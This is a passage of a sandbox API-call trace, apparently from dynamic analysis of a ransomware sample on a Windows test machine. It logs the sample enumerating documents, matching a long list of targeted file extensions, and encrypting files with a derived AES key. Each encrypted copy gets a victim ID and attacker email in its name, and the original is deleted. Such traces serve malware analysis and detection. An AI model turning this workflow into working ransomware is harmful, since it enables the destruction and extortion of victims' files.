	[0187.680] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\a4j36w_yzqhx9oiq.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 114
	[0187.680] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\a4j36w_yzqhx9oiq.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\a4j36w_yzqhx9oiq.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0187.680] WriteFile (in: hFile=0x388, lpBuffer=0xfe9c80*, nNumberOfBytesToWrite=0xcb00, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe9c80*, lpNumberOfBytesWritten=0x18b358*=0xcb00, lpOverlapped=0x0) returned 1
	[0187.686] CloseHandle (hObject=0x388) returned 1
	[0187.687] CloseHandle (hObject=0x2c0) returned 1
	[0187.687] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\a4j36w_yzqhx9oiq.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\a4j36w_yzqhx9oiq.odp")) returned 1
	[0187.693] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\a4j36w_yzqhx9oiq.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\a4j36w_yzqhx9oiq.odp")) returned 0
	[0187.693] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x998f9b0, ftCreationTime.dwHighDateTime=0x1d96fbe, ftLastAccessTime.dwLowDateTime=0x4a6dac30, ftLastAccessTime.dwHighDateTime=0x1d97336, ftLastWriteTime.dwLowDateTime=0x4a6dac30, ftLastWriteTime.dwHighDateTime=0x1d97336, nFileSizeHigh=0x0, nFileSizeLow=0xba56, dwReserved0=0x0, dwReserved1=0x0, cFileName="EaWC7822Ba_1.ppt", cAlternateFileName="EAWC78~1.PPT")) returned 1
	[0187.693] lstrcmpW (lpString1="EaWC7822Ba_1.ppt", lpString2="..") returned 1
	[0187.693] lstrcmpW (lpString1="EaWC7822Ba_1.ppt", lpString2=".") returned 1
	[0187.693] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\"
	[0187.694] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\", lpString2="EaWC7822Ba_1.ppt" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\EaWC7822Ba_1.ppt") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\EaWC7822Ba_1.ppt"
	[0187.694] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\EaWC7822Ba_1.ppt") returned 68
	[0187.694] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0187.694] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\EaWC7822Ba_1.ppt", cchLength=0x44 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\eawc7822ba_1.ppt") returned 0x44
	[0187.694] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.694] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\eawc7822ba_1.ppt", lpSrch="help_decrypt_your_files") returned 0x0
	[0187.695] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\eawc7822ba_1.ppt" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\eawc7822ba_1.ppt") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\eawc7822ba_1.ppt"
	[0187.695] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\eawc7822ba_1.ppt") returned 68
	[0187.695] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0187.695] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.695] StrStrW (lpFirst=".ppt", lpSrch=".") returned=".ppt"
	[0187.695] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.696] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ppt") returned=".ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0187.696] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0187.696] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0187.696] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\eawc7822ba_1.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\eawc7822ba_1.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0188.070] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xba56, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0xba56, lpOverlapped=0x0) returned 1
	[0188.074] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.074] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb198) returned 1
	[0188.077] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.077] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0188.077] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.077] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0188.077] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.077] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb95f0) returned 1
	[0188.078] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.078] CryptEncrypt (in: hKey=0xfb95f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0xba56, dwBufLen=0xba56 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0xba60) returned 1
	[0188.079] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.080] RtlMoveMemory (in: Destination=0xfe8be0, Source=0xfdd180, Length=0xba56 | out: Destination=0xfe8be0) 
	[0188.080] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.080] CryptEncrypt (in: hKey=0xfb95f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe8be0*, pdwDataLen=0x18aefc*=0xba56, dwBufLen=0xba60 | out: pbData=0xfe8be0*, pdwDataLen=0x18aefc*=0xba60) returned 1
	[0188.080] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.080] CryptDestroyKey (hKey=0xfb95f0) returned 1
	[0188.080] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.081] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0188.081] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.081] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0188.081] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.081] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0188.082] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.082] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0188.083] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\eawc7822ba_1.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 110
	[0188.083] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\eawc7822ba_1.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\eawc7822ba_1.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0188.084] WriteFile (in: hFile=0x388, lpBuffer=0xfe8be0*, nNumberOfBytesToWrite=0xba60, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe8be0*, lpNumberOfBytesWritten=0x18b358*=0xba60, lpOverlapped=0x0) returned 1
	[0188.088] CloseHandle (hObject=0x388) returned 1
	[0188.089] CloseHandle (hObject=0x2c0) returned 1
	[0188.089] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\eawc7822ba_1.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\eawc7822ba_1.ppt")) returned 1
	[0188.094] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\eawc7822ba_1.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\eawc7822ba_1.ppt")) returned 0
	[0188.094] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83d48080, ftCreationTime.dwHighDateTime=0x1d971c8, ftLastAccessTime.dwLowDateTime=0x5f766f00, ftLastAccessTime.dwHighDateTime=0x1d97687, ftLastWriteTime.dwLowDateTime=0x5f766f00, ftLastWriteTime.dwHighDateTime=0x1d97687, nFileSizeHigh=0x0, nFileSizeLow=0x1601, dwReserved0=0x0, dwReserved1=0x0, cFileName="g7nE20mhtCw_RF5xX.odp", cAlternateFileName="G7NE20~1.ODP")) returned 1
	[0188.094] lstrcmpW (lpString1="g7nE20mhtCw_RF5xX.odp", lpString2="..") returned 1
	[0188.095] lstrcmpW (lpString1="g7nE20mhtCw_RF5xX.odp", lpString2=".") returned 1
	[0188.095] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\"
	[0188.095] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\", lpString2="g7nE20mhtCw_RF5xX.odp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\g7nE20mhtCw_RF5xX.odp") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\g7nE20mhtCw_RF5xX.odp"
	[0188.095] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\g7nE20mhtCw_RF5xX.odp") returned 73
	[0188.095] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0188.095] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\g7nE20mhtCw_RF5xX.odp", cchLength=0x49 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\g7ne20mhtcw_rf5xx.odp") returned 0x49
	[0188.095] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.096] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\g7ne20mhtcw_rf5xx.odp", lpSrch="help_decrypt_your_files") returned 0x0
	[0188.096] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\g7ne20mhtcw_rf5xx.odp" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\g7ne20mhtcw_rf5xx.odp") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\g7ne20mhtcw_rf5xx.odp"
	[0188.096] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\g7ne20mhtcw_rf5xx.odp") returned 73
	[0188.096] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.096] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.096] StrStrW (lpFirst=".odp", lpSrch=".") returned=".odp"
	[0188.096] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
